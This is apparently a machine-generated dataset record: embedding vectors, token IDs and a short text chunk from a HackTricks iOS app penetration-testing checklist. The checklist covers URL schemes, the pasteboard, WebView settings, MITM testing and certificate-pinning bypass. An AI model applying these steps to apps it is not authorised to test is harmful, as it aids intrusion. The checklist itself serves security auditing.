0.27660101652145386, -0.3407929241657257, 0.5137609243392944, 0.7830229997634888, -0.10253249853849411, 0.1118365079164505, -0.45811545848846436, 0.6149166226387024, 0.46355825662612915, -0.16816917061805725, 0.0026712086983025074, -0.18362411856651306, -0.3336992859840393, 0.4092819392681122, -0.5999336242675781, -0.5088003873825073, -0.8453091382980347, -0.12490050494670868, 0.4282895624637604, -0.11990833282470703, 0.35605382919311523, -0.3957619369029999, -0.18100209534168243, -0.34088221192359924, 0.5278761386871338, -0.09295802563428879, 0.059397827833890915, 0.3926752209663391, -0.21919095516204834, 0.19031791388988495, -0.2614707946777344, 0.37007811665534973, -0.5798218846321106, -0.12944433093070984, 0.6120827198028564, -0.318697988986969, -0.6154109239578247, 1.0561050176620483, 0.20515398681163788, -0.5936944484710693, 0.004451407585293055, -0.4048192799091339, -0.224185973405838, 0.49387335777282715, -0.21422743797302246, 0.08885734528303146, -0.11294097453355789, -0.15438812971115112, -0.37356406450271606, 0.37353643774986267, 0.10857374221086502, 0.12884396314620972, -0.5416148900985718, 0.15294149518013, 0.01059950701892376, -0.7326226830482483, 0.4669226109981537, -0.6913907527923584, -0.1537017673254013, -0.6145466566085815, 0.4879821836948395, -0.24465546011924744, -0.09522227942943573, 1.0337519645690918, -0.17398257553577423, 0.12782618403434753, 0.08936645090579987, -0.165019229054451, 0.3861216604709625, -0.3843308985233307, -0.35690703988075256, 0.8845795392990112, 0.31090453267097473, -0.5675176978111267, -0.20057113468647003, 0.4163004457950592, -0.13509981334209442, -0.012670435942709446, -0.5007015466690063, 0.48567700386047363, 0.05110578611493111, 0.29939278960227966, -0.17372018098831177, -0.39893949031829834, -0.400751531124115, -0.7695034146308899, -0.45523712038993835, 0.46479102969169617, -0.30439960956573486, -0.4101393222808838, 0.4175523817539215, 0.17871664464473724, -0.4103582203388214, -0.23434601724147797, 0.39923015236854553, -0.9638923406600952, 0.44114747643470764, -0.70787113904953, 0.2210450917482376, -0.6805238723754883, -0.47399699687957764, -0.6166190505027771, -0.47672492265701294, -0.26030200719833374, 0.1469115912914276, -0.378383994102478, 0.308141827583313, -0.5019581317901611, 0.167618528008461, -0.33064669370651245, -0.1763586550951004, -0.16255205869674683, -0.4456866681575775, 0.3230605125427246, 0.678500235080719, -0.4474116861820221, 0.13131842017173767, 0.12117752432823181, 0.4116429388523102, 0.6379964351654053, -0.6368800401687622, 0.36874517798423767, -0.1929028034210205, -0.21983392536640167, 0.09179110825061798, 0.34464606642723083, -0.19994565844535828, 0.24114271998405457, 0.2090432196855545, 0.01751452498137951, -0.2985111474990845, -0.5360356569290161, 0.0521676205098629, 0.17494052648544312, -0.41891467571258545, 0.6220797300338745, 0.36750391125679016, 0.2248707264661789, 0.12404424697160721, -0.6866359114646912, 0.8464784622192383, 0.5729901194572449, -0.003005251055583358, 0.33425289392471313, 0.2894348204135895, 0.2059655636548996, -0.6138599514961243, 0.043670687824487686, -0.015342733822762966, -0.5994166135787964, 0.27734681963920593, -0.22609706223011017, -0.12380605936050415, -0.16855646669864655, -0.5375286340713501, 0.6061058640480042, 0.31408461928367615, -0.007609018590301275, 0.4784877300262451, 0.2229120433330536, -0.1354263722896576, -0.5120028257369995, 0.12450816482305527, -1.2502360343933105, -0.1737508922815323, 0.745437741279602, 0.061387404799461365, -0.6171362400054932, -0.08182987570762634, -0.42709946632385254, 0.7435824275016785, -0.03779270499944687, -0.00289030815474689, 0.26808685064315796, 0.20856443047523499, -0.3225737512111664, 0.6796605587005615, -0.3856576979160309, -0.5571638345718384, -0.3456480801105499, 0.222572922706604, -0.5548681020736694, -0.6621859669685364, 0.06296644359827042, 0.8970094323158264, -0.38241463899612427, 0.2266821414232254, -0.658976137638092, 0.3792418837547302, 0.7984107732772827, -0.14744722843170166, 0.39465221762657166, -0.08959101140499115, -0.2519504129886627, 0.8496193289756775, -0.7698385119438171, 0.6543604731559753, -0.16403409838676453, -0.04888227581977844, -0.03338377922773361, -0.26584476232528687, -0.889542818069458, 0.11158129572868347, 0.24108561873435974, -0.2027117908000946, 0.9247748255729675, 0.34874391555786133, 0.22744424641132355, -0.4111992418766022, 0.13525548577308655, -0.4395982325077057, 0.4295637011528015, 0.48972952365875244, 0.18045629560947418, -0.5224486589431763, 0.29088616371154785, 0.3811773657798767, -0.5586870908737183, -0.8336597084999084, 0.5068903565406799, -0.049329668283462524, -0.23923133313655853, 0.19835264980793, -0.27128106355667114, 0.06849663704633713, -0.09787791967391968, -0.3396397531032562, 0.020469723269343376, -0.7520523071289062, 0.4093007743358612, 0.4406954050064087, -0.23852336406707764, 1.0185024738311768, -0.13207806646823883, 0.4781273305416107, -0.2542017996311188, -0.26410576701164246, -0.02624374069273472, -0.046226825565099716, -0.7170425057411194, 0.28374841809272766, 0.46672743558883667, 0.10751008242368698, 0.03819574788212776, 1.043755292892456, -0.4221802353858948, 0.052741896361112595, 0.08623712509870529, 0.13975590467453003, -1.0283397436141968, 0.36423951387405396, -0.08759433776140213, -0.5521754622459412, -0.5448116660118103, 0.05069641396403313, 0.24858976900577545, -0.1904088705778122, -0.15686652064323425, 0.20521944761276245, 0.22673186659812927, -0.37775108218193054, 0.4745465815067291, -0.536332905292511, 0.28145498037338257, 0.5937645435333252, -0.455364853143692, -0.20794041454792023, 0.7664175033569336, 0.01063790637999773, 0.485506147146225, -0.1122475266456604, 0.5786296725273132, 0.4152996242046356, 0.6141738295555115, 0.4201698899269104, -0.17815402150154114, -0.31085944175720215, 0.20951128005981445, -0.13959841430187225, -0.7306246757507324, -0.23210521042346954, -0.16323986649513245, 0.6229973435401917, 0.28023478388786316, -0.11058206856250763, -0.48998671770095825, 0.032589856535196304, -0.5860549211502075, -0.5835641622543335, 0.8384307622909546, -0.2692181468009949, -0.23277848958969116, 0.32224902510643005, 0.4087221622467041, 0.2575128376483917, 0.8616926670074463, -0.06319615989923477, -0.5478247404098511, 0.06338375806808472, -0.10056669265031815, -0.15785887837409973, 1.1744301319122314, -0.4247777462005615, -0.3878124952316284, 0.43630462884902954, -1.0712502002716064, -0.3173327147960663, 0.404109388589859, -0.37142300605773926, -0.3053598701953888, 0.5661255121231079, 0.24205787479877472, 0.5092014670372009, 0.2292693853378296, -0.47553497552871704, -0.3095761835575104, -0.12719714641571045, 0.5419072508811951, -0.7778301239013672, 0.5861074328422546, 0.40486133098602295, -0.2540804147720337, 0.025154126808047295, -0.2808787524700165, 0.5088598728179932, 0.12619322538375854, -0.06044843792915344, -0.4154697358608246, -0.2700153887271881, -0.94905024766922, 0.03222237527370453, 0.3278963565826416, 0.3575984835624695, 0.010549724102020264, 0.3596612513065338, -0.6920046210289001, 0.021604735404253006, -0.43305936455726624, 0.5174943208694458, 0.08630795776844025, -0.28903576731681824, 0.4214543104171753, 0.21001413464546204, 0.8221773505210876, -1.0718709230422974, 4.631691932678223, 0.9073845148086548, -0.056897085160017014, -0.07871107012033463, 0.012024574913084507, 0.6826434135437012, 1.117063045501709, -0.5351292490959167, 0.8278027176856995, -0.44535449147224426, 0.36748942732810974, -0.48260894417762756, 0.26638856530189514, -0.08005543053150177, 0.3070010840892792, 0.44820472598075867, -0.46251630783081055, -0.1716616153717041, 0.20248575508594513, -1.0251991748809814, -0.7296326160430908, 0.10443893820047379, -0.5471928119659424, 0.7347202897071838, 0.3490409553050995, -0.2885666489601135, 0.12328657507896423, -0.7792072892189026, -0.11318782716989517, 0.1296205371618271, -0.37216293811798096, -0.5471263527870178, 0.12071310728788376, -0.14170940220355988, -0.5380280017852783, 0.4044162333011627, 0.4695822298526764, -0.3656545579433441, -0.4499469995498657, 0.08094818145036697, 0.25121182203292847, -0.19727423787117004, 0.4422532021999359, -0.5097975730895996, -0.1755581796169281, 0.671062707901001, -0.43422335386276245, 0.36204996705055237, 0.6508783102035522, -0.5692524909973145, 0.6796420216560364, -0.22508381307125092, 0.6294350624084473, 0.10900504887104034, -0.5450328588485718, 0.22947779297828674, -0.3337976634502411, -0.48916560411453247, 0.15010549128055573, 0.35287371277809143, 0.6753548383712769, -0.3051617741584778, 0.22956590354442596, -0.14612363278865814, -0.6832945346832275, 0.6014743447303772, -0.07257884740829468, 0.39254191517829895, 0.03587573021650314, -0.16585469245910645, 0.11253650486469269, -0.4416447579860687, -0.404294490814209, -0.5398873090744019, 0.9372050166130066, -0.5274766683578491, -0.8927722573280334, 0.05519697815179825, -0.2118910849094391, -1.199474573135376, 0.3408527076244354, -0.43571987748146057, -0.4209553599357605, 0.06467604637145996, 0.8846220970153809, 0.7090169787406921, -0.18510755896568298, -0.34095701575279236, -0.03335830941796303, 0.1941920667886734, 0.31547340750694275, 0.1948622614145279, -0.1129453107714653, -0.28894925117492676, 0.005616489332169294 ]
[ 101, 16380, 7279, 22199, 2075, 4638, 9863, 2224, 7577, 4355, 2000, 4089, 3857, 1998, 8285, 8585, 2147, 12314, 2015, 6113, 2011, 1996, 2088, 1005, 1055, 2087, 3935, 2451, 5906, 1012, 7547, 16416, 2094, 16380, 24078, 28139, 19362, 2063, 2115, 4044, 3752, 16380, 5604, 4044, 16416, 2094, 2035, 1996, 5433, 1997, 16380, 3988, 4106, 2000, 4553, 2691, 4506, 2000, 7279, 22199, 2019, 16380, 4646, 2850, 2696, 5527, 24759, 2923, 6764, 2064, 2022, 2109, 2000, 3573, 7591, 2592, 1012, 4563, 2951, 1006, 29296, 4221, 7809, 1007, 2064, 3573, 7591, 2592, 1012, 8038, 17299, 6790, 15058, 2015, 1006, 29296, 4221, 7809, 1007, 2064, 3573, 7591, 2592, 1012, 2543, 15058, 3335, 1011, 9563, 1012, 8391, 17881, 2064, 3573, 7591, 2592, 1012, 6411, 15058, 5507, 2063, 17881, 2064, 3573, 7591, 2592, 1012, 12441, 16324, 2064, 3573, 7591, 2592, 3540, 5403, 2951, 2064, 3573, 7591, 2592, 4887, 20389, 12070, 20057, 12326, 2015, 2064, 3828, 5107, 7591, 2592, 14839, 24925, 2078, 2003, 2788, 2109, 2000, 3573, 7591, 2592, 2008, 2064, 2022, 2187, 2043, 24501, 23918, 1996, 3042, 1012, 1999, 12654, 1010, 2074, 4638, 2005, 7591, 2592, 5552, 2011, 1996, 4646, 1999, 1996, 6764, 27268, 6633, 14839, 15271, 3527, 2229, 1996, 4646, 3499, 2000, 2224, 7661, 6269, 1029, 4638, 2065, 7591, 2592, 2003, 5552, 1999, 1996, 6269, 17053, 6764, 21197, 22842, 3600, 2065, 7591, 2592, 2003, 2108, 26618, 5963, 22264, 5963, 22264, 2064, 2022, 2109, 2000, 3229, 1996, 7591, 2592, 5552, 1999, 1996, 5371, 2291, 1006, 4638, 1996, 3988, 2391, 1997, 2023, 4638, 9863, 1007, 2036, 1010, 10200, 2015, 2064, 2022, 2109, 2000, 19933, 2070, 22354, 1997, 1996, 4646, 1010, 2059, 9239, 1996, 10200, 2006, 1996, 3042, 1010, 1998, 1996, 2004, 1996, 6310, 9563, 2003, 8209, 2070, 1006, 3036, 1007, 15380, 2089, 2022, 27539, 29098, 19341, 9285, 3638, 5403, 3600, 2005, 7591, 2592, 2503, 1996, 4646, 1005, 1055, 3638, 29162, 19888, 9888, 5403, 3600, 2065, 10930, 2064, 2424, 20786, 2015, 2109, 2005, 19888, 9888, 5403, 3600, 2005, 1996, 2224, 1997, 2139, 28139, 12921, 1013, 5410, 13792, 2000, 4604, 1013, 3573, 7591, 2951, 6806, 6559, 1998, 8080, 19888, 9888, 4972, 4135, 9289, 27280, 10128, 1037, 2334, 27280, 2003, 2109, 1999, 1996, 4646, 1010, 2017, 2323, 4638, 2129, 1996, 27280, 2003, 2551, 1012, 2065, 2009, 1005, 1055, 2478, 1996, 2334, 27280, 7705, 2009, 2071, 2022, 4089, 27539, 10128, 2009, 1005, 1055, 2478, 1037, 3853, 2008, 2064, 8790, 3973, 27539, 2017, 2071, 3443, 1037, 7661, 10424, 8524, 14546, 6132, 13043, 15380, 7524, 2083, 12997, 27631, 20389, 24471, 2072, 28213, 2015, 1013, 2784, 13767, 2015, 1013, 7661, 11683, 5403, 3600, 2065, 1996, 4646, 2003, 25719, 2151, 8778, 1013, 5679, 5403, 3600, 2065, 1996, 4646, 2003, 25719, 2000, 2224, 2151, 8778, 1013, 5679, 5403, 3600, 2065, 1996, 4646, 24273, 2000, 4374, 2151, 2785, 1997, 7591, 2592, 2013, 1996, 7661, 5679, 2008, 2064, 2022, 16618, 2011, 1996, 2178, 4646, 25719, 1996, 2168, 5679, 5403, 3600, 2065, 1996, 4646, 3475, 1005, 1056, 9361, 1998, 2624, 25090, 6774, 5198, 7953, 3081, 1996, 7661, 5679, 1998, 2070, 18130, 2064, 2022, 18516, 5403, 3600, 2065, 1996, 4646, 14451, 2015, 2151, 7591, 2895, 2008, 2064, 2022, 2170, 2013, 5973, 3081, 1996 ]
hack_tricks
42.txt
0
custom schemeuniversal linkscheck if the application is registering any universal protocol / schemecheck the apple - app - site - association filecheck if the application isn't checking and sanitizing users input via the custom scheme and some vulnerability can be exploitedcheck if the application exposes any sensitive action that can be called from anywhere via the custom schemeuiactivity sharingcheck if the application can receive uiactivities and if it's possible to exploit any vulnerability with specially crafted activityuipasteboardcheck if the application if copying anything to the general pasteboardcheck if the application if using the data from the general pasteboard for anythingmonitor the pasteboard to see if any sensitive data is copiedapp extensionsis the application using any extension? webviewscheck which kind of webviews are being usedcheck the status of javascriptenabled, javascriptcanopenwindowsautomatically, hasonlysecurecontentcheck if the webview can access local files with the protocol file : / / ( allowfileaccessfromfileurls, allowuniversalaccessfromfileurls ) check if javascript can access native methods ( jscontext, postmessage ) network communicationperform a mitm to the communication and search for web vulnerabilities. check if the hostname of the certificate is checkedcheck / bypass certificate pinningmisccheck for automatic patching / updating mechanismscheck for malicious third party libraries use trickest to easily build and automate workflows powered by the world's most advanced community tools. [SEP]
[ -0.23819875717163086, -0.4983973801136017, 0.2581120729446411, 0.15164440870285034, -0.2536444365978241, 0.30048614740371704, 0.0434497632086277, -0.15626707673072815, 0.2169046550989151, 0.9105597138404846, -0.3408123552799225, 0.28893861174583435, 0.4958215653896332, -0.22935183346271515, -0.6427257657051086, -0.08603428304195404, -0.2750544548034668, -0.19282937049865723, -0.4656848907470703, -0.162174791097641, 0.7598868012428284, 0.10368109494447708, -1.0734564065933228, -0.9900317192077637, -0.595615804195404, 0.4897313117980957, 0.21523694694042206, -0.13124540448188782, 1.3201357126235962, 1.1624643802642822, -0.40558767318725586, 0.011102421209216118, -0.09848148375749588, -0.2935444712638855, -0.5527505874633789, -1.1901801824569702, 0.4686492681503296, -0.1607530564069748, -0.2827746570110321, -0.8756977915763855, -0.23574446141719818, 0.6046852469444275, 0.5090944170951843, -0.688319206237793, -0.5382834672927856, -0.4666902720928192, -0.4735442101955414, -0.5668562650680542, 0.2969723045825958, -0.04171324893832207, 0.1894071400165558, 0.9483852386474609, 0.29930028319358826, -0.446463942527771, 0.3317805826663971, 0.6816720962524414, -0.23928511142730713, 0.023833557963371277, -0.6461493968963623, -0.11331839114427567, -0.3084770441055298, 0.32730424404144287, 0.17177441716194153, -0.7771226167678833, 0.2193017452955246, 0.7493714690208435, -0.04205003380775452, -0.5085280537605286, 0.08523277193307877, -0.40053853392601013, -0.17044882476329803, 0.3481685519218445, -0.508380651473999, -0.5787920951843262, -0.5277543663978577, 0.6296413540840149, -0.08880436420440674, 0.5855764150619507, 0.4055142104625702, 1.012985348701477, -0.23387844860553741, 0.6348469257354736, 0.04022188484668732, -0.44157615303993225, -0.8289217948913574, -0.4331580400466919, 0.41245368123054504, -0.36787256598472595, 0.07299530506134033, -0.7322978973388672, -0.04063251242041588, 0.7960682511329651, -0.30507463216781616, -0.377782940864563, 0.2768247127532959, 0.3028359115123749, -0.5061745047569275, 0.276166707277298, -0.12737414240837097, 0.7354267239570618, 0.628878116607666, 0.13183893263339996, -0.2164127081632614, 0.40514448285102844, -0.796373188495636, 0.37496599555015564, 0.5818939805030823, -0.3437660336494446, -0.845901370048523, -0.9012871980667114, -0.5501939654350281, 0.006152158137410879, -0.22511817514896393, -0.19775189459323883, -0.19767102599143982, -0.35928505659103394, -0.17381183803081512, -0.061907440423965454, -0.4434873163700104, 0.20432142913341522, 0.777218759059906, -0.1855514794588089, 0.26895034313201904, -0.22672858834266663, 0.40647703409194946, 0.4874591529369354, -0.11590799689292908, 1.0016227960586548, -0.4112528860569, -0.07797902077436447, 0.30732664465904236, 0.025113945826888084, 0.5961199998855591, 0.8797401785850525, -0.35898178815841675, 0.2889775335788727, -0.039724744856357574, -0.10161588340997696, 0.816655695438385, -1.1010537147521973, 0.1913830041885376, 0.6913978457450867, -0.09795116633176804, 1.2391471862792969, -0.14692945778369904, 0.17916828393936157, -0.1649291217327118, -0.5366021394729614, -0.31085118651390076, -0.28932324051856995, 0.5617451071739197, 0.4468061923980713, 0.2267579585313797, -0.2617417275905609, 0.5334483981132507, 0.2621297240257263, -0.30410414934158325, -0.26553142070770264, 0.3441331088542938, 0.21877114474773407, -0.7244862914085388, 1.0584198236465454, -0.18534709513187408, 0.364063560962677, -1.0017116069793701, 0.23994240164756775, -0.34250399470329285, -0.06145432963967323, 0.38269272446632385, 0.36392244696617126, 0.1954212635755539, -0.24949049949645996, -0.82719486951828, 0.5942226648330688, 0.8372041583061218, -0.20713289082050323, 0.8819025754928589, 0.5584522485733032, 0.052848029881715775, 0.39835646748542786, -0.13259904086589813, 0.2024184912443161, 0.4519903063774109, 0.678371250629425, -0.4116050899028778, 0.3068406283855438, -0.20885203778743744, -0.41417184472084045, -0.3407408893108368, -0.4551953375339508, 0.32492125034332275, 0.6095163226127625, -0.12307813763618469, -0.04809220880270004, 0.19953332841396332, 0.04052914306521416, -1.0871413946151733, -0.09276142716407776, -0.1247662901878357, -0.8929119110107422, -0.7220290303230286, 0.32110148668289185, -0.37576138973236084, 0.23259186744689941, -0.294964462518692, -0.8866190314292908, 0.4087062478065491, 0.23153018951416016, -0.19197438657283783, 0.15328620374202728, 0.4159133732318878, -0.16629642248153687, -0.07283297926187515, -0.14929473400115967, 0.22853897511959076, 0.024886591359972954, 0.5417518019676208, 0.23050175607204437, 0.4682859182357788, 0.17708489298820496, 0.05906474590301514, 0.7912794351577759, 0.31742364168167114, -0.18293540179729462, -0.6838704347610474, -0.029074233025312424, -0.25029128789901733, 0.4654253125190735, -0.80620938539505, 0.246139794588089, -0.2061719447374344, 0.14988170564174652, 0.39649906754493713, 0.8236227631568909, 0.15304091572761536, 0.4001392424106598, 0.1519545465707779, 0.36765575408935547, 0.1254274994134903, 0.15419837832450867, 0.08398206532001495, 0.7046378254890442, 0.17031142115592957, 0.6916390061378479, 0.3863013982772827, -0.30131763219833374, -0.09439215064048767, -0.02231430448591709, 0.25527840852737427, 0.5022830963134766, -0.29638782143592834, 1.332694172859192, 0.9595855474472046, 0.18380603194236755, -0.18799704313278198, -0.45423826575279236, 0.07567179203033447, 0.755316972732544, -0.7626755833625793, -0.03769600763916969, 0.44071733951568604, 0.2932063639163971, -0.19218826293945312, -0.21284310519695282, -0.3738672435283661, -0.018941497430205345, 0.9624159336090088, 0.7482605576515198, -0.9934516549110413, -0.3215448260307312, -0.8134279847145081, -0.5156338810920715, -1.0258175134658813, 0.06431236863136292, -0.8304568529129028, 0.08487855643033981, 0.7368723750114441, -1.2860440015792847, 0.5039107799530029, -0.2636503577232361, 0.5674648880958557, -0.024196024984121323, 0.27147388458251953, 0.3684528172016144, -0.2154526561498642, 0.6517236232757568, -1.268921136856079, 0.21396037936210632, 0.4031940996646881, 0.9274206161499023, -0.9950671792030334, 0.8647893667221069, -0.2150009125471115, -0.755287766456604, 0.7257723808288574, -0.9948015213012695, -0.1593380719423294, 0.43646836280822754, -0.40457987785339355, 0.013471133075654507, 0.10430867224931717, 0.01000456977635622, 0.2550733685493469, 0.5151379108428955, -0.6677191853523254, 0.13062436878681183, 0.1214798241853714, -0.5930962562561035, 0.5582262277603149, 0.48221394419670105, -0.23195330798625946, 0.6116399168968201, -0.25107884407043457, -0.008822723291814327, -0.32766860723495483, 0.8854840993881226, 0.7553167939186096, 0.5571151375770569, -0.20416399836540222, 0.04602929949760437, -0.23562759160995483, -0.6114189624786377, -0.513182520866394, -0.014808813109993935, -0.3706061840057373, 0.12516698241233826, 0.7040731906890869, -1.3096284866333008, 0.9912294149398804, -1.0213356018066406, -0.21064630150794983, -0.41178378462791443, -0.06384767591953278, 0.8890374898910522, 0.10668706893920898, 0.18889428675174713, 0.7363231182098389, -0.10291827470064163, -0.5582086443901062, 0.0638452097773552, 0.4503089487552643, -0.26458364725112915, 0.3299332559108734, -0.029316648840904236, -0.06926654279232025, -0.3424150347709656, -0.31744635105133057, -0.5597873330116272, 0.1669469177722931, -0.9807151556015015, -0.3970128893852234, 0.3654302656650543, -0.08158040791749954, -0.09807473421096802, -0.05171484500169754, 1.0924715995788574, -0.25136297941207886, 0.09378048777580261, 0.05074794963002205, 0.43187007308006287, 0.4327666461467743, 0.8983036875724792, 0.25128173828125, -0.009071040898561478, 0.0674513503909111, -0.4035128653049469, -0.2909763753414154, 0.9909177422523499, 0.982767641544342, -0.31055837869644165, 0.05336064472794533, -0.35445231199264526, 0.13426543772220612, 0.44889014959335327, -0.5453373789787292, -0.5453246831893921, 0.016727536916732788, 0.2859784960746765, 0.46536943316459656, -0.2361123412847519, -0.574363112449646, 0.06115599721670151, 0.6166494488716125, 0.5451407432556152, 0.06669013947248459, -0.4652827978134155, -0.870985746383667, -0.3487105965614319, 0.023058248683810234, 0.23605582118034363, -0.6152260303497314, -0.16906008124351501, 0.29467320442199707, 0.07905900478363037, -1.0060244798660278, -0.33942967653274536, 0.12623555958271027, -0.10369163006544113, 0.3870435655117035, -0.1119161918759346, 0.8515101671218872, 0.7524662613868713, 0.6440489292144775, 0.5101457238197327, -0.8681055307388306, -0.0971216931939125, -0.6824826002120972, 0.271002858877182, -0.5245397686958313, -0.08725768327713013, -0.5783969759941101, -0.1587115228176117, -0.36614736914634705, 0.24923212826251984, 0.307181179523468, -0.3581780791282654, -0.9423393607139587, 0.32719847559928894, -0.22326382994651794, -0.26545849442481995, -0.6111287474632263, -0.5376411080360413, -0.8110641241073608, 0.15339358150959015, 0.5685757398605347, -0.35212647914886475, -0.14925140142440796, -0.16982953250408173, 0.09287504106760025, 0.801723837852478, -0.2663600444793701, -0.40238329768180847, -0.21768958866596222, -1.0685629844665527, -0.9535560011863708, 0.8082235455513, 1.3655328750610352, -0.1866096556186676, 0.055367108434438705, -0.8213270902633667, 0.49125075340270996, 0.5970714092254639, -0.6701635718345642, -0.2832874655723572, -0.3071829080581665, -0.5314027070999146, 0.02431311644613743, 0.2738538980484009, -0.39360126852989197, -0.5572888851165771, 0.47083616256713867, -0.7126264572143555, 0.04794877767562866, -0.34650635719299316, -0.6532455086708069, -0.42189082503318787, 1.0427440404891968, -0.37917059659957886, 0.29468435049057007, -0.46712377667427063, -0.06411278992891312, 0.05175027251243591, 0.1929292380809784, -0.3253265917301178, -0.46299904584884644, 0.371191143989563, -0.4507995843887329, 0.1527845412492752, 0.5876432657241821, 0.5279694199562073, -0.4568074345588684, 1.0416676998138428, -0.05962267890572548, -0.4039399027824402, 0.20931649208068848, -0.768292248249054, 0.2284735143184662, 0.3525608777999878, -0.6904714107513428, -0.06061254069209099, -0.9339854121208191, 0.29201388359069824, 0.0352325513958931, -0.16463850438594818, -0.6726043820381165, -0.5239508748054504, -0.25061842799186707, -0.4315880239009857, 0.08772650361061096, 1.3017033338546753, -0.02551531046628952, 0.1773884892463684, 0.5647638440132141, 0.10620023310184479, -0.4105803966522217, -0.3044396638870239, -0.39809316396713257, -0.4524348974227905, 0.24901582300662994, 0.4269116222858429, 0.9220435619354248, 0.14022544026374817, -0.19125054776668549, -0.429273396730423, 0.36630022525787354, 0.3937222957611084, -0.23407645523548126, -0.4292488694190979, 0.4901899993419647, 0.304568350315094, -0.041189055889844894, -0.01911628246307373, 0.3164067566394806, 0.09738855808973312, 0.6609690189361572, 0.17576336860656738, 0.17059297859668732, -0.08096840977668762, -0.39574459195137024, 0.5745524168014526, 0.4573664665222168, -1.0516678094863892, -0.15341982245445251, -0.015314544551074505, -0.2212136834859848, 0.3726729452610016, 0.5298587083816528, -0.24981237947940826, -0.37592989206314087, -0.7842329144477844, 0.21717654168605804, -0.22002452611923218, 0.09407158941030502, -0.17171724140644073, -0.07009968906641006, -0.6581335067749023, 1.4008663892745972, 0.2730782926082611, -0.5856740474700928, -0.5176787972450256, -0.41151872277259827, 0.3972885012626648, -0.5573397278785706, -0.1138606145977974, -0.2877807021141052, -0.49584895372390747, -0.3364989161491394, 0.27451610565185547, 0.24730044603347778, 0.4842450022697449, -0.9196502566337585, -0.29555946588516235, 0.38692015409469604, 0.06662842631340027, -0.15121115744113922, -0.41617652773857117, 0.06771601736545563, 0.26360249519348145, -0.5352817177772522, 0.27592816948890686, -1.190470576286316, 0.5113509297370911, -0.3790583908557892, 0.2356337457895279, -0.004807019140571356, 0.6519784927368164, -0.3884412348270416, 0.5201404690742493, 0.5295606851577759, -0.23466180264949799, 0.6378455758094788, 0.09832458198070526, 1.177643060684204, 0.05143316835165024, 0.08103732019662857, -0.7953583002090454, 0.5003095269203186, -0.9605456590652466, -0.3534008264541626, 0.4215671718120575, 0.22760632634162903, 0.25182652473449707, -0.33806613087654114, -0.43474888801574707, 0.5376313328742981, -0.6866471767425537, 0.3310903310775757, 0.503400444984436, 0.03932841867208481, -0.37491339445114136, -0.45602017641067505, 0.5624785423278809, -0.10801427066326141, -0.41057121753692627, -0.49895405769348145, 0.305909126996994, 0.04846891760826111, -0.13431891798973083, -0.014698339626193047, -0.20185044407844543, -0.5139901638031006, 0.024849269539117813, 0.05583158880472183, -0.5407921075820923, 0.6385873556137085, -0.6902783513069153, -1.1182228326797485, -0.13320164382457733, 0.799525260925293, -0.3780044615268707, -0.08832130581140518, 0.7753355503082275, 0.26373162865638733, -0.2918523848056793, -0.2503671646118164, -0.6817889213562012, -0.0016540883807465434, -0.08169522136449814, 0.32519787549972534, 0.16698351502418518, -0.5166966319084167, 0.09071730077266693, 0.2825488746166229, -0.975185215473175, -0.777912974357605, -0.06730534136295319, 0.015771308913826942, 0.508650004863739, 0.39736083149909973, 0.2310808151960373, 0.18193493783473969, 0.22576647996902466, -0.15269967913627625, 0.6618976593017578, 0.08407919853925705, -0.12446116656064987, -0.39217206835746765, 0.5087173581123352, 0.6802656650543213, -0.08768106997013092, 1.4143404960632324, -0.22469645738601685, -0.5427332520484924, -0.6644025444984436, -0.10914339125156403, -0.49999046325683594, 0.0770852267742157, 1.0211575031280518, -0.15481920540332794, 0.2689380943775177, 0.4919262230396271, 0.3442606031894684, 1.0642421245574951, -0.7993700504302979, 0.46010643243789673, 0.3236301839351654, -0.6325740814208984, -0.11301098763942719, -0.4274166226387024, 0.2883285880088806, 0.018517306074500084, -0.32088029384613037, -0.04542247951030731, 0.535861611366272, 0.5500978827476501, 0.45156437158584595, -0.007838184013962746, -0.7116765975952148, -0.36515143513679504, -0.482536256313324, 0.16884881258010864, 0.24630548059940338, 0.4270629286766052, 0.20082099735736847, -0.5151530504226685, -0.13338541984558105, -0.33743852376937866, -0.43258988857269287, 0.5859931111335754, -0.06258288770914078, 0.20423321425914764, -1.2188706398010254, 0.00911171268671751, -0.4084870517253876, -0.7673994302749634, -0.57431960105896, -0.6598717570304871, 0.1822923719882965, -0.6476189494132996, -0.2625986635684967, 0.06214284524321556, -0.12210958451032639, 0.05540309473872185, -1.2169673442840576, 0.41043543815612793, -0.6377419233322144, -0.31864333152770996, 0.09561942517757416, 0.16453100740909576, -0.1767570823431015, 0.9494007229804993, 0.3101957142353058, 0.2872520089149475, 0.286478191614151, 0.43895262479782104, 0.11055532842874527, 0.07029903680086136, -0.20652255415916443, 0.2257796972990036, 0.07644039392471313, -0.25642210245132446, 0.08960361778736115, -0.4643070101737976, -0.26507312059402466, -0.1743686944246292, 0.041373204439878464, -0.45195460319519043, 0.6079652309417725, 0.2250027060508728, 0.0017930500907823443, -0.17596787214279175, 0.15295246243476868, 0.45284974575042725, -0.6805911064147949, 0.5797557234764099, 1.0818842649459839, 0.29398754239082336, 0.1591927409172058, -0.43896782398223877, -0.06993212550878525, 0.5298965573310852, 0.2691786289215088, -0.5557600259780884, 0.49438270926475525, -0.2109798938035965, -0.7188766598701477, 0.517061710357666, -0.6818767786026001, -0.23675945401191711, 0.4223476052284241, 0.15558862686157227, 0.35733482241630554, 0.5787556767463684, 0.48915889859199524, 0.6156094670295715, -0.806662380695343, 0.0498051680624485, -0.9804922938346863, -0.2390851080417633, 0.5859629511833191, 0.08488617837429047, -0.6565607190132141, -0.22019469738006592, -0.0583823062479496, 0.37226977944374084, 0.00005945446901023388, -0.07700265198945999, -0.1808273196220398, 0.25489938259124756, 0.46934613585472107, 0.25451651215553284, -0.33189401030540466, 0.1894642412662506, -0.13492999970912933, -0.3125574290752411, -0.4567190110683441, -0.6365604996681213, 0.5398768186569214, 0.7694391012191772, 0.1064176931977272, -0.01838678866624832, -0.6273046731948853, 0.04397985339164734, 0.36366331577301025, 0.04022654891014099, 0.38831189274787903, 0.0382627435028553, -1.3674839735031128, 0.45632633566856384, -1.1185091733932495, -0.03572932630777359, 0.24707844853401184, 0.41024720668792725, 0.1372857242822647, -0.34869441390037537, -0.24221204221248627, -0.7841513156890869, 0.25090670585632324, -0.3943707048892975, 0.891322910785675, 0.12274067103862762, 0.6451769471168518, -0.45770975947380066, 0.04661170393228531, 0.09169477969408035, 0.2471877932548523, 0.7890253067016602, 0.488251656293869, 0.05051884427666664, 0.5126845240592957, 0.2205839455127716, -0.29269787669181824, -0.12824074923992157, 0.3595283329486847, -0.9317354559898376, -0.6408675909042358, 0.20515018701553345, -0.2026587724685669, 0.6210705637931824, 0.4787207543849945, -0.2960941195487976, 